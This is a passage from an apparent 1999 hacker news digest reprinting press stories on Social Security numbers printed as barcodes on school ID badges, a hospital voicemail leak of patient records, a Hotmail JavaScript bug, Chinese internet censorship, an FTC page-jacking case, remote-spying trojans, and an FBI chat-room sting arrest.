done nothing wrong. I am not going to wear my ID
badge any longer at school. It's not necessary or
relevant to get an education."
Although teachers are required to report a student
without a badge, Washington and Winchel have not had
any action taken against them for their defiance. Winchel
says at least 350 of the approximately 1,200 students
have signed their petition. She believes more would sign
if it were not for the intimidating announcements made
over the school loud speakers each morning.
Students are warned not to deface the cards or to be in
school without them. Disciplinary action on a school
record could prevent college acceptance in later years,
so Winchel says many students are hesitant to be
supportive.
"Honestly, they are very scared to do anything, and I
don't blame them. When you have the school telling you
that you're going to get detention or suspension for not
wearing your ID badge. While they support this they
don't want to be suspended either," she explained.
Both Winchel and Washington plan to meet with the
school board if the principal fails to resolve the situation.
The petition signed by the students states: "The students
of Ruston High who have signed below realize that the
barcode on each student's ID badge is that student's
Social Security number. They also realize that their
Social Security number may not be used in this manner
and request that they be assigned a generic number as a
barcode."
Tagged students
defy big brother, Part 2
By David M. Bresnahan
© 1999 WorldNetDaily.com
Students at Louisiana's Ruston High School continue to
protest the use of ID badges displaying their Social
Security numbers, one parent is threatening a federal
criminal complaint, and the man who programmed the
computers involved has given advice to the students --
become an administrative headache. (See part one,
Tagged students defy Big Brother in yesterday's WND.)
Each student in Louisiana, whether they know it or not,
has a state student ID number. That number by default
is also their Social Security number. Parents can object
and require the school to use a different number.
"Students' parents can request a new state identification
number if they object to use of the Social Security
number," advised Eric L. Green, who was formerly
contracted to install and administer the computers at
Ruston High School
"The school is required to issue such a number if
requested. This is by both state law and school district
policy," he explained to WorldNetDaily. "This is the
best form of civil disobedience. It causes a serious
administrative headache and gives them great incentive
to change the policy. It also directly involves district
personnel, who, when inconvenienced, are likely to go
to the superintendent's office and say 'This policy must
be changed.'"
Students who have been protesting the new requirement
to wear an ID badge displaying their Social Security
number have refused to wear the controversial badges.
Jonathan Washington was made to wear a temporary
red badge on Thursday.
"I wore it for five minutes, then took it off," said
Washington, 15. He said he did not wear a badge for
the rest of the day. Others have begun to follow
Washington's lead. Indeed, he has obtained hundreds of
signatures of students supporting a petition to remove
the Social Security numbers from the badges.
The school computers contain each student's Social
Security number as well as a specially created student
identification number. That number was created to avoid
problems with the use of Social Security numbers.
"I am mystified why they put the Social Security
numbers on the card, rather than the district-assigned
seven-digit student identification number," Green told
WorldNetDaily. "The district-assigned number was
specifically created over seven years ago due to
concerns about widespread use of the Social Security
numbers, concerns expressed both by Lincoln Parish
School Board district officials and by other school
officials state-wide.
"The student identification number can be queried out of
the Student Information Systems database just as easily
as the Social Security number. The only thing that I can
think of is that the placard-generating software they
used had a nine-digit space for student ID number, and
they were too stupid to figure out how to put a
seven-digit number into that space," he explained from
Arizona where he now lives.
Green was paid as a consultant to install the current
computer system at Ruston High School, and spent two
years supervising the transfer of data from those
computers to the school district and to the state
computers in Baton Rouge. Green also transferred data
from the school lunch program computers to the federal
government.
"The only system I know of that must use the federal
Social Security number is the lunch system, where
various anti-fraud laws require them to submit the data
to the feds and the feds then match it against the food
stamp rosters," Green explained.
The computers do not print out Social Security numbers
on any reports, except for reports required by state and
federal agencies. Reports used by the school system
default to the student identification number, which is
seven digits instead of the nine used by the Social
Security number.
"I have no idea why other software vendors did not
adopt such a solution to privacy concerns with the
Social Security number, just as I have no idea why the
administration at Ruston High School chose to use a
number that their administrative software vendor had
been specifically told (by the school district) not to use
as a publicly reported piece of data, due to privacy
concerns," Green stated.
"At this point, I have discussed the legal ramifications of
this with the principal and an assistant superintendent
who has gotten a legal opinion, albeit I think flawed,
from a lawyer that represents them," said Paul
Washington, father of Jonathan, in a phone interview
with WorldNetDaily. "My feeling is that my next move is
to either contact the federal authorities, or institute a
lawsuit on my own. Either way, I am getting very close
to instituting legal action one way or the other."
Washington said he hopes the school officials will
change the ID cards before he is forced to take legal
action to intervene. He has asked the principal to have
the barcodes cut off the cards, but principal Dr. Charles
Scriber has refused to make any changes.
"If they do not back down before I file, it is going to
raise the stakes," explained Washington of his
expectation that he will seek monetary damages.
"If they were to back down tomorrow, which is really
what I have been after all along, I would say 'great' and
let it go," he offered.
Washington's son and hundreds of other students are
objecting to the fact that their new ID badges display
their Social Security numbers, and they are required to
wear the badges at all times. Anyone could copy down
the numbers and use them improperly.
Washington described how easy it is to look at the
barcode and translate it into the actual numeric Social
Security number. He even published a web site that
teaches others to do it. He and Rachel Winchel have led
a student protest and petition drive in an effort to end
the practice.
"We have been very supportive of what his position is,
and are encouraging him to proceed in a legal and very
appropriate way. When suggestions have been made
which we consider to be inappropriate, we explain
why," said Washington of his son's protest.
Scriber claims the barcode is a form of encryption and
therefore the Social Security number is not actually
displayed for all to see.
"The barcode, in my opinion, is just an alternate means
for writing the number. They claim encryption well,
encryption can only be considered as long as nobody
can read it," said Washington. His son and other
students can demonstrate their ability to read any
barcode in a matter of seconds on sight.
"Philosophically, I am opposed to the wearing of name
tags, but I would not fight that legally if it were not for
the presence of the Social Security number on there.
There is a level of effort that is required to fight this, and
if it's just over the wearing of a name tag, then I'm not
going to go to that level of effort," explained
Washington.
Student ID badges have been moved from wallets to
being worn visibly by many schools across the nation in
an effort to increase security after a rash of school
shootings. Washington and the students do not believe
the badges at Ruston High School contribute to their
safety.
"This makes absolutely no educational sense. The level
of security they are providing with the name tags is zero.
The thing that really bothers me is when they gave out
the name tags, they gave them out with this whistle cord
strap to hang them on. So what you've done is hang a
rope around the neck of all the highschoolers, and told
them to walk through the halls with a rope around your
neck," said Washington.
"They have been pulling on them and one of these days
someone's going to get seriously hurt. I would hate to be
the attorney trying to defend the action of the school in
encouraging, if not requiring them, to wear this rope
around their neck when s
omebody gets hurt by it. It's
just stupid. It's obvious that there is going to be a
problem sooner or later."
Green, a professor at a local college, believes all
schools are filled with inept bureaucrats who make
unwise decisions, and he blamed the cards on an unwise
choice.
David M. Bresnahan, a contributing editor for
WorldNetDaily.com, is the author of a new report
on Y2K, the book "Cover Up: The Art and Science
of Political Deception," and offers a monthly
newsletter "Talk USA Investigative Reports." He
may be reached through email and also maintains
an archive of his work.
Referenced links:
How to read/change the barcode:
http://www.geocities.com/SiliconValley/Bridge/1086/School/barcodes.html
Interview:
http://www.worldnetdaily.com/bluesky_exnews/19990922_xex_louisiana_hi.shtml
Handbook;
http://www.cab.latech.edu/ruston/rhs/hand2.htm
@HWA
28.0 HOSPITAL SECURITY ISSUES
~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Thursday 23rd September 1999 on 1:01 pm CET
WBAI's Off The Hook radio show released information about poor security issues in
St. Joseph's Mercy Hospital. According to them, glitch in the voice mail system
allows callers to access private date of hospital's patients without entering any kind of
password. Story on ZdNet.
(For those that don't know (you been living under a rock??) Off The Hook is hosted by
Emmanuel Goldstein (Eric Corley) founder and editor of 2600 magazine, he can often be
found online on EFNet IRC in #2600 or #off-the-hook)
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2339660,00.html
Medical Records Security
Breach
Unprotected voice system is used by
hospitals across United States;
company that provides system said
security features were included.
September 23, 1999
A disturbing
security breach at
St. Joseph's Mercy
Hospital in Pontiac,
Michigan, left some
confidential patient
records accessible to the public because
the system did not require users to input
a password or any other security
roadblock.
Emmanuel Goldstein, publisher of the
hacker magazine and website 2600.com,
first reported the flaw on public radio
station WBAI's "Off The Hook" on
September 21. The hospital's location was
not known at that time. Goldstein
published a sample audio file on the
2600.com website to alert the country
to the problem, but excised the patient's
name.
Since then a CyberCrime investigation
revealed the location of St. Joseph's
Mercy Hospital as Pontiac, Michigan.
The hospital system uses an internal
digital dictating service that allows
doctors to record and access notes
concerning recent patient examinations
and consultations. The notes include
information about patients, ranging from
admitting and discharge data, to cardiac
and mental health records.
Sonja Berry, public relations spokeswoman
for St. Joseph's Mercy Hospital said the
hospital took immediate action to correct
the situation and reaffirms that the
private information is no longer available
to outside callers. She said the hospital is
now investigating to ensure the problem
will never happen again.
Berry also said that she could not provide
an explanation for the error, but confirmed
that the dictation service was provided by
Dictaphone Corporation of Stratford,
Connecticut, and is used by other
hospitals around the country.
Security features disabled?
In a phone interview with CyberCrime
Legal Analyst Luke Reiter, Dictaphone Vice
President Don Fallati said the company
wants more time to verify that the system
was installed by Dictaphone.
However, Fallati insists that Dictaphone's
products include security features.
"We are trying to confirm that, in this
particular instance, the system is ours,
and what the background to it was,"
Fallati said. "But in general, our digital
dictation systems do have
password-protection features that can be
enabled."
"I'm just not sure in this case what the
background was as to why or why not
those may have been used," Fallati added.
The CyberCrime team continues to
investigate whether these
password-protection measures were
disabled-- and if so, by whom.
@HWA
29.0 HOTMAIL STILL FAR FROM SECURE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 22nd September 1999 on 11:30 pm CET
Microsoft can't seem to shake the security gremlins from its Hotmail free email
service. The software giant is investigating yet another security dilemma with its
Hotmail service that permits the sending of JavaScript code that could automatically
present a bogus password entry screen. Usernames and passwords entered by
unsuspecting users could be collected by the email sender. Georgi Guninski today
pointed out this latest problem in the so plagued free e-mail service, revolving around
bypassing Hotmails' security policies regarding JavaScript code through putting it in
HTML image files.
http://news.cnet.com/news/0-1005-200-122099.html?tag=st.ne.1002.thed.1005-200-122099
Hotmail bug allows password theft
By Erich Luening
Staff Writer, CNET News.com
September 22, 1999, 12:45 p.m. PT
Microsoft can't seem to shake the security gremlins from its Hotmail free email service.
The software giant is investigating yet another security dilemma with its Hotmail service that permits the sending of JavaScript
code that could automatically present a bogus password entry screen. Usernames and passwords entered by unsuspecting
users could be collected by the email sender.
Microsoft said it is looking into the issue, although it has not received any other reports on this security problem.
JavaScript is a Web scripting language developed by Netscape Communications for performing actions on Web pages without
user input. The language is commonly used for launching pop-up windows or for scrolling text, but
it has also become a major security headache for browser makers and Web sites like Hotmail
because of its potential usefulness to malicious hackers.
Earlier this month, Microsoft confirmed a JavaScript password-stealing exploit that had the same
effect as the most recent one, but that was implemented differently, according to Georgi Guninski,
a Bulgarian programmer.
Guninski claims the new JavaScript glitch circumvents Hotmail security barriers by placing the
JavaScript in HTML image files.
Microsoft confirmed that the glitch is yet another way to execute malicious code in someone's
email.
"We do filter out some JavaScript tags to provide better security, to stop some hacks and spoofs,"
said MSN lead product manager Deanna Sanford. "As we get these reports, we are evaluating
other filters to provide to users. It's an ongoing process."
As an extreme measure to protect against such security breaches, both Guninski and Sanford said users can disable JavaScript
in their browsers.
After a security problem last week exposed Hotmail users to attack, Microsoft acknowledged it was hiring an outside firm to
examine security at the free email service.
@HWA
30.0 THE GREAT FIREWALL OF CHINA
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 22nd September 1999 on 11:20 pm CET
China is a growing market for online companies and services. But nowadays a 1993
ban on foreign investment in its online industry has put up quite a hurdle for
companies dealing in tech products and e-commerce a like so far. China's main
concerns with the Internet focus on one thing, how to remain in control. Here's an
article on how they're planning to do just that.
http://www.thestandard.com/articles/display/0,1449,6411,00.html?home.of
The World's Wide Web: The
Great Fire Wall of China
By Matthew Yeomans
Here's a global teaser: Name the country
that currently languishes at the bottom of
the Internet food chain, but will have an
estimated 141 million people online by the
year 2005 and will be the largest
e-commerce market in the world. Hint: It's
the most populous nation on earth.
Right now, China counts only 1.4 million
Internet users, but that hasn't halted
companies like Microsoft (MSFT) , AOL (AOL)
, Yahoo (YHOO) and Dow Jones from
plunging into the alluring, but officially
off-limits, waters of the Chinese Internet
industry. Even Christian broadcaster Pat
Robertson is getting in on the act as a major
investor of Zhaodaola, a Beijing-based Web
portal.
But amid the heady rush to dot-com this
vast country lies a nagging question: What
will be the electronic boundaries of the Net
in China? The answer is of prime concern for
Western investors who spend long days
strategizing about how to wire the sleeping
giant. The person who may hold the answer,
at least for the moment, is Wu Jichuan,
China's minister of information industry.
That's why Western politicians and
executives were dumbstruck as Wu
announced that his government would begin
to enforce a 1993 ban on foreign investment
in its online industry. Wu's salvo may signal
little more than a return to hardball
negotiations over China's entry into the
World Trade Organization, which the Clinton
administration would like to see happen
before the end of the year. "This is classic
Chinese bargaining," says Peter Lovelock,
head of Maverick, a telecom consulting
company in Hong Kong.
But other industry watchers aren't as
convinced. "The head of MII is seeming to
kick the door shut on foreign investment in
China's information industries," says Ken
Grant, executive editor of Virtual China's
China Matrix Web site. "It remains to be
seen whether he can keep it closed."
Somewhere beyond all this Beijingology lie
two fundamental concerns for China: How
does it maintain control of what could be its
most influential industry of the next century,
and, just as important, how does it control
the information passed along the Web? After
all, the Internet may be a fine tool for
promoting e-commerce in a giant structured
market economy, but it's likely to play havoc with the official party
line. This hasn't been lost on the ruling technocrats who realize the
Internet is their real-life forbidden fruit: They can't wait to taste it,
but they dare not.
Not surprisingly, all the major players in the domestic Internet boom
are closely monitored by the Chinese government and any offending
information, for instance about Taiwan, Tibet or whatever the current
bete noire, is quickly blocked by a vigilant team of government Web
censors. Both the leading domestic portals Netease and Sina.com
rarely run afoul of the authorities because they don't place material
that breaks from the party line on their mainland Chinese sites.
Ironically, the government's most high-profile victim of political
blocking so far is its own China.com, a strictly controlled Web portal
that is traded on the Nasdaq and is 60 percent owned by the state
news service Xinhua with AOL holding another 8 percent. Last spring,
according to watchers of the Chinese Web, China.com caught the
censors' eyes when it ran items about Taiwan on its mainland site.
The articles were compiled by programmers based in Hong Kong.
China.com has publicly denied being blocked.
But the ever expanding Web universe stretches well beyond the eye
of even China's Ministry of Information Industry. Internet users in
China report that the government either overlooked or couldn't be
bothered to block a U.S. State Department archive site on the 1989
Tiananmen protests. That's just the sort of vast cybersecurity breach
which international dissidents and human-rights activists intend to
exploit. While they may be able to reach only a small percentage of
the Chinese population, activists maintain that in a Chinese society,
where Internet access is available only to the rich, the intellectuals
and the students, it's not about how many people they reach, but
which ones.
"What scares the Chinese government so much is that the people who
have access to the Internet right now have historically been the
people who have launched revolutions," says Bobson Wong, director
of the Digital Freedom Network, a Web site dedicated to airing
dissident voices that have been silenced in their own lands.
Leading the charge is a former Tiananmen Square activist who goes
by the pseudonym, Richard Long. Everyday, Long publishes a
newsletter called VIP Reference that he sends to over 30,000 Chinese
e-mail accounts whether they want it or not. In short, Long is using
the scourge of Western e-commerce, spamming, to advocate social
change in China. VIP Reference is taken so seriously in China that two
weeks ago, one dissident, Qi Yanchen, was arrested and charged with
sedition for printing copies of the newsletter to pass around. While
some activists complain that Long's political mass mailing alienates
people in China and endangers some underground dissidents, Long
says VIP Reference feeds "an information-hungry country." With spam,
of course.
But is it realistic to expect Internet commerce to bring about
democracy in China? After all, telling China that it's morally better to
be like the West and here's a new Pepsi ad to prove it is unlikely to
change a government that hasn't so much as flirted with democracy
for over 5,000 years. At the same time, in a world where Tiananmen
Square leader Ling Chai seeks to realize her ideals through a software
startup, it's not surprising that someone like Long would seek to make
politics and business work together. Long thinks nothing of exchanging
his database of 500,000 addresses with young Chinese entrepreneurs
in return for a list of their clients. "Everybody knows I have the
largest Internet database in China," he says, matter-of-factly.
Despite Wu's concerns over controlling the telecommunications
industry, China may well already be on an unstoppable course. While
the cost of PCs remains prohibitively high for the ordinary Chinese, the
country's cellular and cable network offers the hope of cheap mass
connectivity in the near future. And while the Chinese may not surf as
much as Americans, they certainly watch TV. There are some 320
million television sets in China, and companies such as the Web portal
MyWeb are exploring the possibilities of wiring China via a vast system
of set-top boxes.
So even if China chose to pursue its digital future alone, it might still
be building a bigger soapbox for Long and other dissidents. You never
know, the revolution may yet be televised.
@HWA
31.0 FTC CRACKS INTERNATIONAL PORN RING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 22nd September 1999 on 10:40 pm CET
US and Australian authorities have raided a online porn ring, which according to the
Federal Trade Commission, "hijacked" Web sites and "kidnapped" innocent surfers,
redirecting them to its smut sites. The FTC also announced a new Internet Lab that
will track and gather evidence on illegal activities in cyberspace. ZDNet
http://www.zdnet.com/zdnn/stories/news/0,4586,2339568,00.html?chkpt=hpqs014
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
FTC cracks international porn ring
By Randy Barrett, Inter@ctive Week
September 22, 1999 1:10 PM PT
URL: http://www.ynotnetwork.com/ho/index.html
The Federal Trade Commission announced Wednesday it has won a federal injunction against an
international porn ring that cloned 25 million Web pages and "hijacked" unsuspecting visitors to its
smut sites.
The defendants -- Carlos Pereira, Guiseppe Nirta and his company called W.T.F.R.C. Pty. Ltd.
-- were all named in a preliminary injunction by the Eastern District Court of Virginia. Periera is
believed to reside in Portugal, while Nirta and WTFRC are based in Australia.
"These operators hijacked Web sites, 'kidnapped' consumers and held them captive," said Jodie
Bernstein, director of the FTC's Bureau of Consumer Protection.
"When consumers used search engines to find subjects as innocent as 'Kids on the Net,' 'News
about Kosovo,' or 'wedding services,' they risked being exposed to a torrent of tawdry images."
In its complaint, the FTC alleged that the group "page-jacked" 25 million legitimate Web pages by
copying them in their entirety and either resubmitting them with search engines such as AltaVista
and Yahoo! (Nasdaq:YHOO), or waiting for automatic crawlers to do the work for them. The
purloined pages included those of the Harvard Law Review, the Japanese Friendship Garden
and NewWorld.com, which owns the popular Adrenaline Vault game site.
The net effect of the mass page copying was that Web surfers using search engines would choose
sites with legitimate names and descriptions, but be instantly redirected to porn enclaves.
Once there, the FTC alleges, the defendants used another trick, called "mouse trapping," to render
the back-page and browser-close buttons useless via special Java code. Visitors were then forced
to shut down their computers to close the session.
Australian raids
Australian law enforcement raided WTFRC facilities Wednesday and seized numerous servers as
evidence. Allan Asher, deputy chairman of the Australian Competition and Consumer
Commission, said by videophone from Canberra that law enforcement authorities there had raided
eight locations, gathering information for possible criminal prosecution or civil action.
FTC officials said the Portuguese Instituto do Consumidor had cooperated in
investigations of Pereira.
Web address administrator Network Solutions Inc. (Nasdaq:NSOL)
appears to have complied with the federal injunction and shut down several
domains used by the defendants, including www.atariz.com and
www.pirate.lynx.com.
Bernstein presented lawyer John Fischer of Irving, Texas, who said his client,
Newworld.com, owner of the game site Adrenaline Vault, at Avault.com,
was hijacked.
In court papers, Fischer said the company was considering the possible sale
of a portion of Adrenaline Vault to investors for more than $20 million when the hijacking
occurred.
100th FTC complaint
"We lost thousands of dollars a day (in value)," Fischer told the news conference, until he got
search engines to restore access.
Fischer said he sought help without success from the FBI, state and
local authorities. Eventually the Federal Trade Commission became
involved, exercising its authority to act against deception and unfairness to consumers.
At its press conference, the FTC also unveiled a new Internet Lab where the agency will track and
gather evidence on illegal activities in cyberspace. The "page-jacking" case is the 100th
Internet-related complaint brought by the commission to date.
Reuters contributed to this report.
@HWA
32.0 WINLINUX2000 Windows or Linux? can't decide? try this ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<geez, it had to happen didn't it?, now everyone that can't get linux running is
gonna be grabbing this and trying to run 'sploits and shit...reminds me of the bbs
days when Christmas rolled around and all the newbies that got modems for xmas
flooded the boards...sigh - Ed >
From Help Net Security http://www.net-security.org/
by BHZ, Wednesday 22nd September 1999 on 3:27 am CET
Ever heard of WinLinux 2000? Today final Beta version of WinLinux 2000 for
evaluation and testing was released. WinLinux 2000 is the first Linux distribution
developed for Microsoft Window. http://linuxpr.com/releases/406.html
WinLinux 2000: The First Linux
for Windows
Sep 21st, 16:09 UTC
JRCP today released to the Internet community the final Beta version of
WinLinux 2000 for evaluation and testing.
September 21, 1999 - JRCP today released to the Internet community the
final Beta version of WinLinux 2000 for evaluation and testing. WinLinux
2000 is the first Linux distribution developed for Microsoft Windows(tm)
users and its unique features include:
Windows integration: WinLinux 2000 uses the latest technology
available in the industry to install as easily as any Windows
application.
Smart configuration: Thanks to the exclusive detection software which
combines Windows and Linux expertise, most of the hardware
devices are detected and automatically configured to reflect current
settings and preferences.
Safe installation: WinLinux 2000 performs a safe installation because a
risky operation (HD repartitioning) common to most Linux systems is
not needed to install it
Easy troubleshooting: a Troubleshooting Utility is included to simplify
the request of Online Support
Optimal Disk Usage: WinLinux 2000 shares free disk space with
Windows, i.e., you do not have to set two independent hard disk
partitions that do not share free disk space.
Familiar look and feel: K Desktop Environment plus WinLinux
additions turn it into a familiar place to work with easy access to
Windows network drives and the Internet.
"WinLinux is a real alternative for both Windows and Linux users", says
Jacob Hartmann, 52, JRCP CFO.
WinLinux 2000 uses the award winning K Desktop Environment as its
graphical user interface. It comes with Netscape Communicator, KOrganizer
and support for Debian, Slackware and Red Hat format packages which
extend the range of supported applications.
As WinLinux 2000 bridges the gap that has been preventing Windows users
from installing and configuring a Linux system in the last years, it is expected
that more and more software vendors port their desktop applications, games
and utilities to this open platform.
According to Mr. Dinamerico Schwingel, 30, JRCP CTO, "Linux has
already matured to be used on desktop machines and, besides that, it is
based on the Open Source concept which leverages the playing field for all
software makers".
During the installation process WinLinux 2000 does not change any of the
machine settings and keeps users' data safe from partitioning the hard drive.
The product is being placed as an add-on to Microsoft Windows and it is
even displayed as installed sofware in the Control Panel. Although WinLinux
2000 installation is in English, support for German, French or Spanish can be
selected after installing it.
Beta version of WinLinux 2000 can be downloaded from the website
http://www.winlinux.net and no registration is required. The release version is
expected to be available by beginning of November.
Further contact must be addressed to info@winlinux.net
Windows is a registered trademark of Microsoft. Linux is a registered
trademark of Linus Torvalds. WinLinux is a service mark of JRCP. Other
trademarks belong to their owners. JRCP is a privately held company and
can be contacted by e-mail at info@winlinux.net or on the web at
http://www.winlinux.net.
(Submitted by Dwight Johnson of Linux Today)
@HWA
33.0 YOUR PC COULD BE TAPPED
~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 22nd September 1999 on 0:10 am CET
If you're finding user-installed cameras and/or microphones on Windows NT machines
in your enterprise, be afraid--they could be used for electronic espionage. As we
reported earlier U.S. Army special agents have been showing their commanding
officers how to turn microphones and cameras into remote spying devices using
remote administration tools as BO and Netbus. Here's another article about it.
http://www.pcworld.com/pcwtoday/article/0,1510,12891,00.html
Your PC May Be Tapped
Microphones and cameras can provide hackers
with the perfect view for electronic espionage.
by Computerworld staff, Computerworld
September 21, 1999, 10:31 a.m. PT
If you're finding user-installed cameras and/or
microphones on Windows NT machines in your
enterprise, be afraid--they could be used for electronic
espionage.
For the past four months, U.S. Army special agents
have been showing their commanding officers how to
turn microphones and cameras into remote spying
devices.
"We run this in the lab here all the time. You can hear
the guys talking (from another room), but they have no
idea you're listening to them," says Jeff Hormann,
special agent in charge of the Computer Crime
Resident Agency, U.S. Army Criminal Investigation
Command.
The attack is delivered to the victim as a Trojan
horse--a hostile applet carrying executable code--via an
e-mail attachment. Once the attachment is opened, the
attacker, using ports 12345 and 12346 on the desktop,
or via HTTP Web protocol and file transfer protocol
connections, can load a remote administration tool and
order the Trojan horse to turn on the video and/or audio
of the targeted machine.
By exploiting remote administration tools such as
NetBus and Back Orifice, both of which the Army has
proved can be used, the attacker can hijack desktop
camera and microphone applications and then direct
image and voice transmissions to the attacker's PC.
Because user-installed cameras and microphones
usually don't have indicator lights, the victim is
completely unaware of any eavesdropping, according to
Hormann and others. And no desktop image, except
maybe a small tool bar icon, will appear on the victim's
computer to indicate that the audio and video capture
are on, he adds.
Uninvited Attendees?
Worse, says Powell Hamilton, manager of technology
risk services at PricewaterhouseCoopers, attackers
can use the same tactics to hijack an online meeting
session conducted through systems like Microsoft's
NetMeeting, and grab shared whiteboard information.
One comforting fact, Hamilton says, is that
microphones and cameras have yet to proliferate
across the enterprise because image, voice, and
videoconferencing technologies are still rough around
the edges. And, he adds, security fears will probably
continue to stall widespread adoption.
Hamilton says nearly 40 percent of the client sites he
has reviewed don't have virus protection, and 90 percent
don't use intrusion detection software. While this may
seem like a basic step, keeping virus- and
intrusion-detection tools up to date can help.
Symantec's Norton AntiVirus, for example, recognizes
when NetBus 1.6 and 2.0 and Back Orifice and Back
Orifice 2000 are running on a desktop.
But hackers now possess compiling tools to change
the attack signatures, making it more difficult for
packaged applications to catch these attacks.
So, what can you do about electronically committed
corporate espionage? First, manually cap cameras and
unplug microphones when you are not using them. And
if your organization is moving toward adoption of voice
and video technologies, pay for higher-end microphones
and cameras with indicator lights.
For more enterprise computing news, visit
Computerworld Online. Story copyright 1999
Computerworld Inc. All rights reserved.
@HWA
34.0 HOW THE FBI BAITED THE NAUGHTON TRAP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 21st September 1999 on 11:55 pm CET
By now you've probably all heard of Patrick Naughton getting arrested for allegedly
luring a 13-year-old girl into a sexual liaison. Here's an article on that and on how the
FBI lured him into the trap using "cyber-tricks" (basically pretending to be a young
girl). The Seattle Times.
http://www.seattletimes.com/news/local/html98/patt_19990921.html
How FBI baited trap that snared Web
wiz
by Ian Ith
Seattle Times Eastside bureau
In the pantheon of the Internet, the brilliant minds that invented,
shaped and groomed the cyberspace world, Patrick Naughton is
at least a demigod. To the tech-savvy, he is something close to a
household word.
He is credited with inspiring and helping to invent Java, the
revolutionary, Internet-friendly computer language. Later, he was
a guiding force in Paul Allen's brainchild Starwave. And most
recently, he was an executive vice president at the popular Web
portal company Infoseek. He is worth millions.
So yesterday, while some who worked with Naughton said it was
no secret he frequented cyberspace's seamier side, it was hard to
comprehend how someone so deeply in tune with the technology
could have stumbled into an FBI trap - allegedly duped into
thinking he was luring a 13-year-old girl into a sexual liaison when
in reality he was the one about to be snared.
"It has not been a secret we're out there policing the Internet,"
said Special Agent Randy Aden, who heads the FBI team that
arrested Naughton on Thursday in Santa Monica, Calif.
Naughton, 34, has been charged in federal court with interstate
travel with the intent of having sex with a minor. Additional
charges are possible. Investigators are reviewing the contents of a
laptop computer Naughton turned over to them.
He is free on $100,000 bond while awaiting arraignment Oct. 12
in California. Under terms of his bail, he can't go anywhere but
Washington and California, he surrendered his passport, he can't
use the Internet except for business purposes and is forbidden to
be alone with minors without consent of their parents, said
Assistant U.S. Attorney Patricia Donahue.
Naughton has not commented and couldn't be reached yesterday.
How the FBI tracks chat rooms
In a criminal complaint filed in U.S. District Court, agents said
they posed as a teen in an Internet chat room in March and were
contacted by Naughton, who was calling himself "hotseattle."
Over seven months, "hotseattle" and agents conversed, the
complaint said. Authorities said he invited the "girl" to meet him
Sept. 16 at the Santa Monica Pier, promising to take her to his
hotel room and show her photos of himself with another girl he
supposedly had on his computer.
Instead, the person waiting was an undercover FBI agent.
Naughton was jailed overnight, and his laptop computer seized as
evidence.
Naughton, Aden said, was essentially netted in an FBI trawling
expedition in the vast ocean of chat rooms.
Aden is one of a pair of special agents assigned to the FBI's
Sexual Assault Special Enforcement (SAFE) team in Los
Angeles, which was formed in 1995 because of the sudden
upsurge in sex crimes using the Internet.
How the FBI tracks chat rooms is a trade secret, Aden said. But
the complaint involving Naughton reveals at least one key element:
They use the same cyber-tricks that make chat-room visitors think
they are safe and anonymous.
Internet chat rooms allow people to log on using strictly
anonymous nicknames. And newer, Internet-based e-mail
services such as Hotmail and Yahoo! allow people to get and
send e-mail anonymously.
"The Internet gives a false sense of anonymity," Aden said.
So FBI agents go to chat rooms and pretend to be young girls.
Essentially, they bait the hook and hope for a bite.
The criminal complaint against Naughton said that while he was
arranging to meet with the undercover agent, he also was allegedly
chatting with other girls and claimed to have already met some of
them.
The origins of Java
Naughton's rise to success started in his family's popular
restaurant in Churchville, N.Y., where Naughton earned enough
money to buy his first computer, an Apple II.
After earning straight A's in Catholic schools, Naughton worked
his way through college as a software engineer. He graduated
from Clarkson University in Potsdam, N.Y., in 1988.
Immediately, he was off to Silicon Valley to work for Sun
Microsystems.
Two years later, Naughton was frustrated with the company and
had accepted another job with Apple Computer founder Steve
Jobs at his new company, NeXT. As an off-handed, parting shot,
Naughton sent a missive to Sun CEO Scott McNealy saying Sun
had lost its vision.
McNealy paid to keep Naughton and handed him the reins of a
project called "Green," which would eventually give birth to Java,
a computer language that can be read by more than one computer
operating system.
"If I had left, Java wouldn't have existed," he told the Rochester
Business Journal in New York in 1997.
In the wake of Java's success, he also wrote two books, "The
Java Handbook" and "Java: The Complete Reference."
In a 1997 piece he wrote for Forbes magazine titled "Mr. Famous
Comes Home," Naughton said he joined Starwave because he
had finally had enough of Sun: "I had done all this work and was
not going to get any of the glory," he said.
"But I'd have lots and lots of regrets if I'd become a short-order
cook at Denny's. Given that I'm the president of a company that
has five of the top 10 Internet properties on the planet, it's OK. . .
. I'm glad I'm at the top of the food chain."
So much to lose
At Starwave and later at Infoseek, he is known as an outgoing,
energetic leader. He enjoys ice hockey and boating and played on
a company soccer team.
"He's someone whom everybody looked up to," said an Infoseek
employee who asked not to be named. "It's a double sting to have
someone who was looked up to have a fall like this."
Not everyone was so surprised. Other former colleagues said it
was common knowledge around the office that Naughton
frequented chat rooms.
Meanwhile, Naughton's former colleagues at Sun, as well as
executives at Starwave and Infoseek, have declined comment.
Infoseek has said only that Naughton no longer works there, and
the company doesn't condone "behavior of this nature."
Disney, which owns 43 percent of Infoseek and is in the midst of
buying the rest of the company, has sought to distance itself from
Naughton's arrest. He was an employee of Infoseek, not Disney,
a spokeswoman said. But at the same time, top Disney executive
Steven Bornstein is visiting the Bellevue office today to speak with
employees. Bornstein was recently named the new chairman of
Disney's Buena Vista Internet Group.
Naughton is married to a Seattle artist. They have no children. His
stock and options in Infoseek, where he earned $183,000 a year,
have been valued at $13.3 million. The couple's Perkins Lane
home overlooking Puget Sound was purchased for $1.2 million.
To most observers, what seems strange is that someone like
Naughton, with so much to lose, could do what the FBI says he
did. But counselors who treat sex offenders aren't surprised at all
by such cases.
"You're asking: How could somebody so smart be so stupid?"
says Michael O'Connell, president of the state chapter of the
Association for the Treatment of Sexual Abusers.
"The working answer is, boy, when you get yourself wrapped up
in this stuff - whether it's alcohol abuse, gambling or sexual
